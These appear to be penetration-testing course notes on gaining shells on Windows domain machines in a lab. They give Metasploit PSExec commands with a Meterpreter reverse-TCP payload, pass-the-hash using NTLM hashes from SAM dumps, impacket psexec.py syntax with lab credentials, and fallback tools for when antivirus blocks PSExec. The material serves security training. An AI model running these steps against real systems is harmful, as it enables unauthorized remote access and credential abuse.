Gaining Shells on Remote Machines in Network Penetration Testing
Gaining Shells on Remote Machines
Overview of Techniques
- Ability to capture hashes, crack passwords, and dump hashes via SAM (Security Account Manager) in relay attacks.
- Objectives: Gain a shell on machines using various methods.
Methods to Gain Shells
- Using Metasploit with PSExec Module
- PSExec allows remote execution of commands on Windows systems.
- Required parameters for PSExec include:
- RHOST: The remote host.
- SMB Domain: Domain of the target system.
- User: Username for authentication.
- Password: Password or hash for authentication.
- Steps to Execute PSExec Module:
1. Launch Metasploit using msfconsole command.
2. Search for PSExec module using command: search PSExec.
3. Select the exploit: use exploit/windows/smb/psexec.
4. Verify the default payload is set to Windows Meterpreter Reverse TCP.
5. Adjust the payload to windows/x64/meterpreter/reverse_tcp for 64-bit targets.
6. Set required options:
- set RHOST [target IP]
- set SMB Domain [domain]
- set SMB User [username]
- set SMB Pass [password]
7. Run the exploit using the command: run.
8. Once a shell is obtained, this session can be backgrounded using background command.
- Alternative: Using Hashes Instead of Passwords
- If obtained a hash from SAM dump, it can be used directly for authentication without needing the original password.
- Consideration:
- It is crucial to note that cracks aren't needed to leverage hashes.
- Understanding that domain compromise often does not require a shell. One can gather sensitive data or conduct attacks without gaining a shell.
Lab Walkthrough
- Initial Setup:
1. Start Metasploit: msfconsole.
2. Search for PSExec module: search PSExec.
3. Choose the appropriate exploit: use exploit/windows/smb/psexec. (Option 4 in example)
4. Change default payload to windows/x64/meterpreter/reverse_tcp.
5. Configure target machine and set the following parameters:
- set RHOST 192.168.138.137
- set SMB Domain marvel.local
- set SMB User fcastle
- set SMB Pass password1
6. Review configuration using options command.
7. Execute the exploit with the run command to obtain a shell.
Backgrounding Sessions
- Utilize
background command to keep the session accessible while exploring other targets. - Manage multiple sessions using the
sessions command to list and switch between shells.
- Setting Session to Use NTLM Hash for Authentication:
- Switch parameters to use the administrator user:
- set SMB User administrator
- Unset domain using unset SMB Domain.
- Set password directly as the NTLM hash.
- The NTLM hash must be copied correctly (including both LM and NT parts).
- Execute the Attack:
- Run Metasploit and provide the hash to gain access without knowing the original password.
Alternative Shell Acquisition Methods
- Using PSExec.py:
- Directly use the Python script to execute similar commands:
- Command structure: psexec.py marvel.local/FCastle -p password1 192.168.138.137
- Provides an immediate shell without needing Metasploit. - Using Alternative Tools When Necessary:
- If PSExec fails (e.g., due to antivirus), explore other tools:
- WMIExec: Utilizes Windows Management Instrumentation.
- SMBExec.py: Another script for executing commands via SMB.
- All methods ultimately serve the same goal: obtaining shells on machines based on system configurations and access controls.
Key Considerations
- Gaining a shell is not always essential for compromising a domain,
- Techniques can vary between various environments, and tools must adapt to changing security measures.
- Remain aware of security alerts and detection mechanisms during operations.
Conclusion
- Understanding these methods is vital as they provide multiple pathways to access systems, regardless of hashed credentials or direct passwords, enhancing pentesting and security auditing capabilities.
- The knowledge of various attack vectors prepares one for effective assessments and demonstrates flexibility in tool usage.